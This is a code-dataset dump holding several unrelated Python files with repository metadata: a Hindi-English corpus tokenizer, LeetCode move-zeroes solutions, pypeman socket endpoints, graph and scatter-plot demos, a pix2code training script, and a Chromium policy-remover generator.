hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e348cfac18c80bd7b466cf308e654ac0c004c60b | 5,977 | py | Python | utils/parseHindi.py | anshulsamar/seq | c117cc4b30b3825b20afbdcf25d314b192951dcb | [
"Apache-2.0"
] | null | null | null | utils/parseHindi.py | anshulsamar/seq | c117cc4b30b3825b20afbdcf25d314b192951dcb | [
"Apache-2.0"
] | null | null | null | utils/parseHindi.py | anshulsamar/seq | c117cc4b30b3825b20afbdcf25d314b192951dcb | [
"Apache-2.0"
] | null | null | null | from random import shuffle
import random
import math
import string
import sys
import os
import string
import pdb
eng_punctuation = string.punctuation + '\xe2\x80\x9c' + '\xe2\x80\x9d'
hindi_punctuation = ['\xe0\xa5\xa4'] #danda
# words like don't are split into don ' t
# This version doesn't do anything about punctuation inside words
# and only considers punctuation at the beginning or end of a word
print sys.argv
if len(sys.argv) < 3:
print('python parseHindi.py nameOfSaveDir cutOff')
exit()
data_dir = '/deep/group/speech/asamar/nlp/data/hindi/source/'
save_dir = sys.argv[1] + '/'
cutOff = int(sys.argv[2])
print('Only sentences less than ' + str(cutOff) + ' will be taken from English.')
print('Only sentences less than ' + str(2*cutOff) + ' will be taken from Hindi.')
if not os.path.exists(save_dir):
print('Making directory ' + save_dir)
os.makedirs(save_dir)
print('Loading Original Hindi Dataset')
train_set_size = 273000
data = open(data_dir + 'hindencorp05.plaintext','r')
lines = data.readlines()
count = 0
print('Creating Train and Test Source Sets')
train_f = open(save_dir + 'ptb.train.txt', 'w')
test_f = open(save_dir + 'ptb.test.txt', 'w')
for line in lines:
if count < train_set_size:
train_f.write(line)
else:
test_f.write(line)
count = count + 1
data.close()
train_f.close()
test_f.close()
print('Building Vocabulary from Training Set')
punctuation = string.punctuation
eng_vocab = {}
hindi_vocab = {}
data = open(save_dir + 'ptb.train.txt','r')
num_lines = 0
max_eng_length = 0
max_hindi_length = 0
corresponding_line = ''
for line in data:
orig_line = line.lower().strip()
split_line = orig_line.split('\t')
eng_sent = splitSentence(split_line[3])
hindi_sent = splitSentence(split_line[4])
if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
addToVocab(eng_vocab,eng_sent)
addToVocab(hindi_vocab,hindi_sent)
num_lines = num_lines + 1
if len(eng_sent) > max_eng_length:
max_eng_length = len(eng_sent)
if len(hindi_sent) > max_hindi_length:
max_hindi_length = len(hindi_sent)
corresponding_line = orig_line
print('Lines below cutoff: ' + str(num_lines))
print('Max English Length: ' + str(max_eng_length))
print('Max Hindi Length: ' + str(max_hindi_length))
print(corresponding_line)
data.close()
print('Sorting Eng Vocab')
eng_vocab = sorted(eng_vocab,key = lambda x: eng_vocab[x])
eng_vocab.reverse()
print('Sorting Hindi Vocab')
hindi_vocab = sorted(hindi_vocab,key = lambda x: hindi_vocab[x])
hindi_vocab.reverse()
print('Parsing Train and Test Set')
for a in [['ptb.train.txt','enc_train.txt','dec_train.txt'],['ptb.test.txt','enc_test.txt','dec_test.txt']]:
data = open(save_dir + a[0],'r')
enc_to = open(save_dir + a[1],'w')
dec_to = open(save_dir + a[2],'w')
count = 0
for line in data:
orig_line = line.lower().strip()
s = orig_line.split('\t')
eng_sent = splitSentence(s[3])
hindi_sent = splitSentence(s[4])
if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
enc_to.write(removeOOV(eng_vocab,eng_sent).strip() + '\n')
dec_to.write(removeOOV(hindi_vocab,hindi_sent).strip() + '\n')
count = count + 1
if (count % 1000 == 0):
print('Finished parsing ' + str(count))
sys.stdout.flush()
data.close()
enc_to.close()
dec_to.close()
print('Total parsed: ' + str(count))
| 31.962567 | 116 | 0.59913 | from random import shuffle
import random
import math
import string
import sys
import os
import string
import pdb
eng_punctuation = string.punctuation + '\xe2\x80\x9c' + '\xe2\x80\x9d'
hindi_punctuation = ['\xe0\xa5\xa4'] #danda
# words like don't are split into don ' t
def splitSentence(from_sent):
    """Tokenize *from_sent*, normalizing curly double quotes to '"'.

    NOTE(review): in the inner loop the else-branch appends every
    non-punctuation character individually and advances `start` each
    iteration, so the slices `word[start:i]` / `word[start::]` are always
    empty -- the effective output is one token per character (plus whole
    tokens for punctuation-only words).  This looks like a leftover of the
    commented-out apostrophe handling below; confirm whether character-level
    tokenization is intended before changing it.
    """
    split_sent = []
    start = 0
    from_sent = from_sent.split()
    for word in from_sent:
        start = 0
        # Replace UTF-8 curly double quotes with a plain ASCII quote.
        if '\xe2\x80\x9c' in word:
            word = word.replace('\xe2\x80\x9c','\"')
        if '\xe2\x80\x9d' in word:
            word = word.replace('\xe2\x80\x9d','\"')
        if word in string.punctuation or word in hindi_punctuation:
            # Whole word is a single punctuation mark (incl. the Hindi danda).
            split_sent.append(word)
        else:
            for i in range(0,len(word)):
                if word[i] in string.punctuation or word[i] in hindi_punctuation:
                    if word[start:i] != '':
                        split_sent.append(word[start:i])
                    split_sent.append(word[i])
                    start = i + 1
                #if word[i] == '\'' and i != 0 and i != (len(word) - 1) and word[i+1] not in string.punctuation:
                #    split_sent.append(word[i::])
                #    start = len(word)
                #    break
                else:
                    split_sent.append(word[i])
                    start = i + 1
            if word[start::] != '':
                split_sent.append(word[start::])
    return split_sent
# This version doesn't do anything about punctuation inside words
# and only considers punctuation at the beginning or end of a word
def splitSentenceFast(from_sent):
    """Tokenize *from_sent*, splitting punctuation only at word edges.

    Faster variant of splitSentence: it never looks for punctuation inside a
    word, only a single leading and/or trailing punctuation character.  Curly
    double quotes are normalized to '"'.  Returns the list of tokens.
    """
    split_sent = []
    for word in from_sent.split():
        # Normalize curly double quotes before any punctuation test.
        word = word.replace('\xe2\x80\x9c', '\"').replace('\xe2\x80\x9d', '\"')
        if word in string.punctuation or word in hindi_punctuation:
            # Bug fix: the original had no continue/else here, so a
            # punctuation-only word fell through and was re-emitted by the
            # edge checks below (up to three appends for one character).
            split_sent.append(word)
            continue
        start = 0
        if word[0] in string.punctuation:
            split_sent.append(word[0])
            start = 1
        if word[-1] in string.punctuation:
            middle = word[start:-1]
            # Bug fix: skip the empty token the original emitted for words
            # consisting of two punctuation characters (e.g. '".').
            if middle:
                split_sent.append(middle)
            split_sent.append(word[-1])
        else:
            split_sent.append(word[start:])
    return split_sent
def addToVocab(vocab, sent):
    """Increment the occurrence count in *vocab* for every token of *sent*."""
    for token in sent:
        vocab[token] = vocab.get(token, 0) + 1
def removeOOV(vocab, sent):
    """Rebuild *sent* as a string with OOV tokens replaced by '<unk>'.

    *vocab* is a list ordered by descending frequency; only its first 10000
    entries count as in-vocabulary.  Every emitted token is followed by a
    single space (so a non-empty result ends with a trailing space), exactly
    matching the original contract; an empty *sent* yields ''.
    """
    # Perf fix: the original called list.index() for every token (O(len(vocab))
    # per lookup).  A set over the first 10000 entries gives O(1) membership
    # and is equivalent: index(token) < 10000 iff token is in vocab[:10000].
    in_vocab = set(vocab[:10000])
    return ''.join((token if token in in_vocab else '<unk>') + ' ' for token in sent)
# ---------------------------------------------------------------------------
# Script body (Python 2): split the corpus into train/test files, build
# frequency-sorted vocabularies, then write OOV-filtered parallel files.
# ---------------------------------------------------------------------------
print sys.argv
if len(sys.argv) < 3:
    print('python parseHindi.py nameOfSaveDir cutOff')
    exit()
data_dir = '/deep/group/speech/asamar/nlp/data/hindi/source/'
save_dir = sys.argv[1] + '/'
# Only sentence pairs shorter than cutOff (English side) and 2*cutOff
# (Hindi side) are kept everywhere below.
cutOff = int(sys.argv[2])
print('Only sentences less than ' + str(cutOff) + ' will be taken from English.')
print('Only sentences less than ' + str(2*cutOff) + ' will be taken from Hindi.')
if not os.path.exists(save_dir):
    print('Making directory ' + save_dir)
    os.makedirs(save_dir)
print('Loading Original Hindi Dataset')
# The first train_set_size corpus lines form the train split, the rest test.
train_set_size = 273000
data = open(data_dir + 'hindencorp05.plaintext','r')
lines = data.readlines()
count = 0
print('Creating Train and Test Source Sets')
train_f = open(save_dir + 'ptb.train.txt', 'w')
test_f = open(save_dir + 'ptb.test.txt', 'w')
for line in lines:
    if count < train_set_size:
        train_f.write(line)
    else:
        test_f.write(line)
    count = count + 1
data.close()
train_f.close()
test_f.close()
print('Building Vocabulary from Training Set')
# NOTE(review): this local alias appears unused below.
punctuation = string.punctuation
eng_vocab = {}
hindi_vocab = {}
data = open(save_dir + 'ptb.train.txt','r')
num_lines = 0
max_eng_length = 0
max_hindi_length = 0
corresponding_line = ''
# Lines are tab-separated; column 3 is used as the English side and
# column 4 as the Hindi side.
for line in data:
    orig_line = line.lower().strip()
    split_line = orig_line.split('\t')
    eng_sent = splitSentence(split_line[3])
    hindi_sent = splitSentence(split_line[4])
    if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
        addToVocab(eng_vocab,eng_sent)
        addToVocab(hindi_vocab,hindi_sent)
        num_lines = num_lines + 1
        if len(eng_sent) > max_eng_length:
            max_eng_length = len(eng_sent)
        if len(hindi_sent) > max_hindi_length:
            max_hindi_length = len(hindi_sent)
            # Only tracks the line that set the Hindi maximum.
            corresponding_line = orig_line
print('Lines below cutoff: ' + str(num_lines))
print('Max English Length: ' + str(max_eng_length))
print('Max Hindi Length: ' + str(max_hindi_length))
print(corresponding_line)
data.close()
print('Sorting Eng Vocab')
# sorted() over a dict yields its keys, here ascending by count; after
# reverse() each *_vocab is a list of words in descending frequency order --
# the ordering removeOOV's 10000-word cutoff relies on.
eng_vocab = sorted(eng_vocab,key = lambda x: eng_vocab[x])
eng_vocab.reverse()
print('Sorting Hindi Vocab')
hindi_vocab = sorted(hindi_vocab,key = lambda x: hindi_vocab[x])
hindi_vocab.reverse()
print('Parsing Train and Test Set')
# For each split write an encoder file (English) and a decoder file (Hindi)
# with out-of-vocabulary tokens replaced by <unk>.
for a in [['ptb.train.txt','enc_train.txt','dec_train.txt'],['ptb.test.txt','enc_test.txt','dec_test.txt']]:
    data = open(save_dir + a[0],'r')
    enc_to = open(save_dir + a[1],'w')
    dec_to = open(save_dir + a[2],'w')
    count = 0
    for line in data:
        orig_line = line.lower().strip()
        s = orig_line.split('\t')
        eng_sent = splitSentence(s[3])
        hindi_sent = splitSentence(s[4])
        if len(eng_sent) < cutOff and len(hindi_sent) < 2*cutOff:
            enc_to.write(removeOOV(eng_vocab,eng_sent).strip() + '\n')
            dec_to.write(removeOOV(hindi_vocab,hindi_sent).strip() + '\n')
            count = count + 1
            if (count % 1000 == 0):
                print('Finished parsing ' + str(count))
                sys.stdout.flush()
    data.close()
    enc_to.close()
    dec_to.close()
    print('Total parsed: ' + str(count))
| 2,360 | 0 | 92 |
601f07a9d220323fc83bfb20cfcc81fe7983dd95 | 548 | py | Python | easy/283. Move Zeroes.py | junyinglucn/leetcode | 1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7 | [
"MIT"
] | null | null | null | easy/283. Move Zeroes.py | junyinglucn/leetcode | 1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7 | [
"MIT"
] | null | null | null | easy/283. Move Zeroes.py | junyinglucn/leetcode | 1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7 | [
"MIT"
] | null | null | null | # Solution A
# Solution B
| 21.92 | 51 | 0.421533 | # Solution A
class Solution:
    """LeetCode 283 (Move Zeroes), two-pass variant: compact then zero-fill."""

    def moveZeroes(self, nums):
        """Move all zeros in *nums* to the tail in place, preserving order."""
        if not nums:
            return 0
        write = 0
        for value in nums:
            if value:
                nums[write] = value
                write += 1
        nums[write:] = [0] * (len(nums) - write)
# Solution B
class Solution:
    """LeetCode 283 (Move Zeroes), single-pass swap variant."""

    def moveZeroes(self, nums):
        """Swap each non-zero value forward so zeros accumulate at the end."""
        if not nums:
            return 0
        slot = 0
        for idx, value in enumerate(nums):
            if value:
                nums[slot], nums[idx] = nums[idx], nums[slot]
                slot += 1
| 436 | -12 | 96 |
f0c559f76ba2dfee10760eeb157eef237ae05544 | 2,967 | py | Python | pypeman/endpoints.py | klausfmh/pypeman | 4eabfc537fb9b995480d65f8233f767fe99efcc1 | [
"Apache-2.0"
] | 6 | 2016-04-19T15:26:11.000Z | 2021-03-16T18:06:53.000Z | pypeman/endpoints.py | mhcomm/pypeman | 6583fae28bcb47e3b8091c39a91854ae36172cbd | [
"Apache-2.0"
] | 68 | 2016-05-12T16:10:11.000Z | 2022-03-02T01:30:36.000Z | pypeman/endpoints.py | klausfmh/pypeman | 4eabfc537fb9b995480d65f8233f767fe99efcc1 | [
"Apache-2.0"
] | 9 | 2015-12-23T08:23:03.000Z | 2021-09-03T09:22:51.000Z | import asyncio
import logging
import socket
logger = logging.getLogger(__name__)
all_endpoints = []
def reset_pypeman_endpoints():
    """
    Clear the module-level ``all_endpoints`` book-keeping list.

    Useful in unit tests so endpoints registered by one test do not
    leak into the next.
    """
    all_endpoints.clear()
from pypeman.helpers import lazyload # noqa: E402
wrap = lazyload.Wrapper(__name__)
wrap.add_lazy('pypeman.contrib.http', 'HTTPEndpoint', ['aiohttp'])
wrap.add_lazy('pypeman.contrib.hl7', 'MLLPEndpoint', ['hl7'])
| 29.376238 | 99 | 0.560836 | import asyncio
import logging
import socket
logger = logging.getLogger(__name__)
all_endpoints = []
def reset_pypeman_endpoints():
    """Empty the module-level ``all_endpoints`` registry in place.

    Handy between unit tests so endpoints created by one test do not
    leak into the next.
    """
    del all_endpoints[:]
class BaseEndpoint:
    """Base class for endpoints; every instance is registered globally."""
    def __init__(self):
        # Book-keeping: track each endpoint in the module-level list
        # (cleared by reset_pypeman_endpoints()).
        all_endpoints.append(self)
    async def start(self):
        """Start the endpoint; no-op here, meant to be overridden."""
        pass
class SocketEndpoint(BaseEndpoint):
    """Endpoint backed by a TCP or unix-domain listening socket."""
    def __init__(self, loop=None, sock=None, default_port='8080', reuse_port=None):
        """
        :param reuse_port: bool; if true the listening port given via *sock*
                    will be shared with other processes on the same port.
                    Has no effect when an already-bound socket object is passed.
        :param sock: string 'host:port'
                    or unix-socket string ("unix:/socket/file/path")
                    or an already-bound socket object
        """
        super().__init__()
        self.loop = loop or asyncio.get_event_loop()
        self.reuse_port = reuse_port
        # Canonicalize string specs to 'host:port' form up front.
        self.sock = self.normalize_socket(sock, default_port=default_port)
    @staticmethod
    def normalize_socket(sock, default_port="8080"):
        """Fill in default host (127.0.0.1) and port for 'host:port' strings.

        Unix-socket strings ('unix:...') and socket objects pass through
        unchanged.
        """
        if isinstance(sock, str):
            if not sock.startswith('unix:'):
                # Guarantee a ':' so the split below always yields two parts.
                if ':' not in sock:
                    sock += ':'
                host, port = sock.split(":")
                host = host or '127.0.0.1'
                port = port or default_port
                sock = host + ':' + port
        return sock
    @staticmethod
    def mk_socket(sock, reuse_port):
        """
        Make, bind and return a socket when *sock* is a string spec;
        otherwise return the (assumed already-bound) socket object as-is.
        """
        if isinstance(sock, str):
            if not sock.startswith('unix:'):
                try:
                    host, port = sock.split(":")
                    port = int(port)
                    if not host:
                        # Bare raise with no active exception: deliberately
                        # trips the except clause below for an empty host.
                        raise
                    bind_param = (host, port)
                except Exception:
                    logger.exception('error on sock params in socket endpoint')
                    raise
                sock_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            else:
                # 'unix:<path>' -> bind to the filesystem path after 'unix:'.
                bind_param = sock.split(":", 1)[1]
                sock_obj = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            if reuse_port:
                # Hard-coded Linux value of SO_REUSEPORT;
                # socket.SO_REUSEPORT is not exposed on every platform.
                SO_REUSEPORT = 15
                sock_obj.setsockopt(socket.SOL_SOCKET, SO_REUSEPORT, 1)
            sock_obj.bind(bind_param)
        else:
            # Already a socket object: caller is responsible for binding.
            sock_obj = sock
        return sock_obj
    def make_socket(self):
        """
        Create/bind the socket for this endpoint and store it on the
        instance as ``self.sock_obj``.
        """
        self.sock_obj = self.mk_socket(self.sock, self.reuse_port)
from pypeman.helpers import lazyload # noqa: E402
wrap = lazyload.Wrapper(__name__)
wrap.add_lazy('pypeman.contrib.http', 'HTTPEndpoint', ['aiohttp'])
wrap.add_lazy('pypeman.contrib.hl7', 'MLLPEndpoint', ['hl7'])
| 414 | 1,976 | 100 |
162b96b51249301f1c4ae7e666bd60e4bfd68af2 | 677 | py | Python | data/gen_GN.py | leo201313/pysimuComplexNetwork | 5ee6b2e61b1b6f587edb2a948cafb4fd869ad8ba | [
"MIT"
] | null | null | null | data/gen_GN.py | leo201313/pysimuComplexNetwork | 5ee6b2e61b1b6f587edb2a948cafb4fd869ad8ba | [
"MIT"
] | null | null | null | data/gen_GN.py | leo201313/pysimuComplexNetwork | 5ee6b2e61b1b6f587edb2a948cafb4fd869ad8ba | [
"MIT"
] | null | null | null | import networkx as nx
import matplotlib.pyplot as plt
G_fb = nx.read_edgelist("facebook_combined.txt", create_using = nx.Graph(), nodetype=int)
print(nx.info(G_fb))
# if need drawing
ps = nx.spring_layout(G_fb)
nx.draw(G_fb, ps, with_labels = False, node_size = 5)
plt.show()
# ps = nx.spring_layout(G_fb)
# betCent = nx.betweenness_centrality(G_fb, normalized=True, endpoints=True)
# node_color = [20000.0 * G_fb.degree(v) for v in G_fb]
# node_size = [v * 10000 for v in betCent.values()]
# plt.figure(figsize=(20,20))
# nx.draw_networkx(G_fb, pos=ps, with_labels=False,
# node_color=node_color,
# node_size=node_size )
# plt.axis('off') | 33.85 | 89 | 0.694239 | import networkx as nx
import matplotlib.pyplot as plt
G_fb = nx.read_edgelist("facebook_combined.txt", create_using = nx.Graph(), nodetype=int)
print(nx.info(G_fb))
# if need drawing
ps = nx.spring_layout(G_fb)
nx.draw(G_fb, ps, with_labels = False, node_size = 5)
plt.show()
# ps = nx.spring_layout(G_fb)
# betCent = nx.betweenness_centrality(G_fb, normalized=True, endpoints=True)
# node_color = [20000.0 * G_fb.degree(v) for v in G_fb]
# node_size = [v * 10000 for v in betCent.values()]
# plt.figure(figsize=(20,20))
# nx.draw_networkx(G_fb, pos=ps, with_labels=False,
# node_color=node_color,
# node_size=node_size )
# plt.axis('off') | 0 | 0 | 0 |
6482b7c2f93f1b8d9a3b2bfa04efecc920a5fabc | 1,200 | py | Python | path_planning/pyqtgraph_test.py | matthaeusheer/playground | 407086c8070cf71280b426db61fbe03034283760 | [
"MIT"
] | null | null | null | path_planning/pyqtgraph_test.py | matthaeusheer/playground | 407086c8070cf71280b426db61fbe03034283760 | [
"MIT"
] | 1 | 2020-11-14T09:42:28.000Z | 2020-11-14T09:42:28.000Z | path_planning/pyqtgraph_test.py | matthaeusheer/playground | 407086c8070cf71280b426db61fbe03034283760 | [
"MIT"
] | null | null | null | from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import random
# Create the main application instance
pg.setConfigOption('background', 'w')
app = pg.mkQApp()
view = pg.PlotWidget()
view.resize(800, 600)
view.setWindowTitle('Scatter plot using pyqtgraph with PyQT5')
view.setAspectLocked(True)
view.show()
n = 1000
print('Number of points: ' + str(n))
data = np.random.normal(size=(2, n))
# Create the scatter plot and add it to the view
scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=5, color='r'), symbol='d', size=2)
view.setXRange(-10, 10)
view.setYRange(-10, 10)
view.addItem(scatter)
pos = [{'pos': data[:, i]} for i in range(n)]
now = pg.ptime.time()
scatter.setData(pos)
print("Plot time: {} sec".format(pg.ptime.time() - now))
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| 23.529412 | 82 | 0.6875 | from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import random
# Create the main application instance
pg.setConfigOption('background', 'w')
app = pg.mkQApp()
view = pg.PlotWidget()
view.resize(800, 600)
view.setWindowTitle('Scatter plot using pyqtgraph with PyQT5')
view.setAspectLocked(True)
view.show()
n = 1000
print('Number of points: ' + str(n))
data = np.random.normal(size=(2, n))
# Create the scatter plot and add it to the view
scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=5, color='r'), symbol='d', size=2)
view.setXRange(-10, 10)
view.setYRange(-10, 10)
view.addItem(scatter)
pos = [{'pos': data[:, i]} for i in range(n)]
now = pg.ptime.time()
scatter.setData(pos)
print("Plot time: {} sec".format(pg.ptime.time() - now))
def update():
global scatter, data
data = data = np.random.normal(size=(2, n))
pos = [{'pos': data[:, i]} for i in range(n)]
scatter.setData(pos)
app.processEvents()
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| 164 | 0 | 23 |
13bf024126f34b18d324f0ca9bb1bb8e2e18d82c | 2,229 | py | Python | model/train.py | enixjm/pix2code | ad617cbca9d0c39cbecf426cc9fdc6f08059f4d8 | [
"Apache-2.0"
] | null | null | null | model/train.py | enixjm/pix2code | ad617cbca9d0c39cbecf426cc9fdc6f08059f4d8 | [
"Apache-2.0"
] | null | null | null | model/train.py | enixjm/pix2code | ad617cbca9d0c39cbecf426cc9fdc6f08059f4d8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
import tensorflow as tf
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
import sys
from classes.dataset.Generator import *
from classes.model.pix2code import *
if __name__ == "__main__":
argv = sys.argv[1:]
if len(argv) < 2:
print "Error: not enough argument supplied:"
print "train.py <input path> <output path> <is memory intensive (default: 0)> <pretrained weights (optional)>"
exit(0)
else:
input_path = argv[0]
output_path = argv[1]
use_generator = False if len(argv) < 3 else True if int(argv[2]) == 1 else False
pretrained_weigths = None if len(argv) < 4 else argv[3]
run(input_path, output_path, is_memory_intensive=use_generator, pretrained_model=pretrained_weigths)
| 34.292308 | 126 | 0.720054 | #!/usr/bin/env python
__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
import tensorflow as tf
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
import sys
from classes.dataset.Generator import *
from classes.model.pix2code import *
def run(input_path, output_path, is_memory_intensive=False, pretrained_model=None):
    """Train the pix2code model (Python 2 script).

    :param input_path: dataset directory given to Dataset.load / load_paths_only.
    :param output_path: directory receiving metadata, vocabulary and weights.
    :param is_memory_intensive: when True, stream batches from a generator
        instead of converting the whole dataset to in-memory arrays.
    :param pretrained_model: optional path to existing weights to warm-start.
    """
    # Fixed seed for reproducibility.
    np.random.seed(1234)
    dataset = Dataset()
    dataset.load(input_path, generate_binary_sequences=True)
    dataset.save_metadata(output_path)
    dataset.voc.save(output_path)
    if not is_memory_intensive:
        # In-memory path: materialize arrays for model.fit().
        dataset.convert_arrays()
        input_shape = dataset.input_shape
        output_size = dataset.output_size
        print len(dataset.input_images), len(dataset.partial_sequences), len(dataset.next_words)
        print dataset.input_images.shape, dataset.partial_sequences.shape, dataset.next_words.shape
    else:
        # Generator path: only paths are kept, batches are built lazily.
        gui_paths, img_paths = Dataset.load_paths_only(input_path)
        input_shape = dataset.input_shape
        output_size = dataset.output_size
        # NOTE(review): integer division under Python 2 if both are ints.
        steps_per_epoch = dataset.size / BATCH_SIZE
        voc = Vocabulary()
        voc.retrieve(output_path)
        generator = Generator.data_generator(voc, gui_paths, img_paths, batch_size=BATCH_SIZE, generate_binary_sequences=True)
    model = pix2code(input_shape, output_size, output_path)
    if pretrained_model is not None:
        model.model.load_weights(pretrained_model)
    if not is_memory_intensive:
        model.fit(dataset.input_images, dataset.partial_sequences, dataset.next_words)
    else:
        model.fit_generator(generator, steps_per_epoch=steps_per_epoch)
if __name__ == "__main__":
    # CLI: train.py <input path> <output path> [memory intensive 0/1] [weights]
    argv = sys.argv[1:]
    if len(argv) < 2:
        print "Error: not enough argument supplied:"
        print "train.py <input path> <output path> <is memory intensive (default: 0)> <pretrained weights (optional)>"
        exit(0)
    else:
        input_path = argv[0]
        output_path = argv[1]
        use_generator = False if len(argv) < 3 else True if int(argv[2]) == 1 else False
        # NOTE: the "weigths" typo is only a local variable name.
        pretrained_weigths = None if len(argv) < 4 else argv[3]
        run(input_path, output_path, is_memory_intensive=use_generator, pretrained_model=pretrained_weigths)
| 1,351 | 0 | 23 |
557b7f3c6e40e0d49df35a36e2bb1426aaf857c8 | 2,209 | py | Python | chrome/browser/ash/policy/tools/generate_device_policy_remover.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668 | 2015-01-01T01:57:10.000Z | 2022-03-31T23:33:32.000Z | chrome/browser/ash/policy/tools/generate_device_policy_remover.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 86 | 2015-10-21T13:02:42.000Z | 2022-03-14T07:50:50.000Z | chrome/browser/ash/policy/tools/generate_device_policy_remover.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941 | 2015-01-02T11:32:21.000Z | 2022-03-31T16:35:46.000Z | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create function which removes the specified device policies
from ChromeDeviceSettingsProto.
This function is primarily intended to be used
for the implementation of the DeviceOffHours policy.
"""
from optparse import OptionParser
import sys
file_header = """//
// DO NOT MODIFY THIS FILE DIRECTLY!
// IT IS GENERATED BY generate_device_policy_remover.py
// FROM chrome_device_policy_pb2.py
//
#include "chrome/browser/ash/policy/core/device_policy_remover.h"
namespace policy {
void RemovePolicies(enterprise_management::ChromeDeviceSettingsProto* policies,
const std::vector<int>& policy_proto_tags_to_remove) {
for (const int tag : policy_proto_tags_to_remove) {
switch(tag) {
"""
file_footer = """ }
}
}
} // namespace policy
"""
if __name__ == '__main__':
sys.exit(main())
| 31.112676 | 79 | 0.722952 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create function which removes the specified device policies
from ChromeDeviceSettingsProto.
This function is primarily intended to be used
for the implementation of the DeviceOffHours policy.
"""
from optparse import OptionParser
import sys
file_header = """//
// DO NOT MODIFY THIS FILE DIRECTLY!
// IT IS GENERATED BY generate_device_policy_remover.py
// FROM chrome_device_policy_pb2.py
//
#include "chrome/browser/ash/policy/core/device_policy_remover.h"
namespace policy {
void RemovePolicies(enterprise_management::ChromeDeviceSettingsProto* policies,
const std::vector<int>& policy_proto_tags_to_remove) {
for (const int tag : policy_proto_tags_to_remove) {
switch(tag) {
"""
file_footer = """ }
}
}
} // namespace policy
"""
def main():
    """Generate the device-policy remover C++ source file.

    Positional args: the output .cc path, then the directories of the
    protobuf descriptor_pool, symbol_database and chrome_device_policy_pb2
    modules, which are injected into sys.path before the proto import.
    Returns 0 (used as the process exit code).
    """
    parser = OptionParser(usage=__doc__)
    (opts, args) = parser.parse_args()
    off_hours_cleaner_path = args[0]
    descriptor_pool_path = args[1]
    symbol_database_path = args[2]
    chrome_device_policy_pb2_path = args[3]
    sys.path.insert(0, descriptor_pool_path)
    sys.path.append(symbol_database_path)
    sys.path.append(chrome_device_policy_pb2_path)
    # Make reload google library
    # which might be already loaded due to Google App Engine
    # TODO(crbug.com/764314): find better solution how to import protobuf.
    import google.protobuf
    # Python 3 doesn't expose a global `reload`.
    if sys.version_info.major == 2:
        reload(google)
        reload(google.protobuf)
    else:
        import importlib
        importlib.reload(google)
        importlib.reload(google.protobuf)
    from chrome_device_policy_pb2 import ChromeDeviceSettingsProto
    with open(off_hours_cleaner_path, 'wt') as file:
        file.write(file_header);
        # Emit one switch case per top-level proto field, clearing that policy.
        for field in ChromeDeviceSettingsProto.DESCRIPTOR.fields:
            file.write('      case {proto_tag}:\n'
                       '        policies->clear_{name}();\n'
                       '        break;\n'
                       .format(proto_tag=field.number, name=field.name))
        file.write(file_footer);
    return 0
if __name__ == '__main__':
sys.exit(main())
| 1,203 | 0 | 23 |
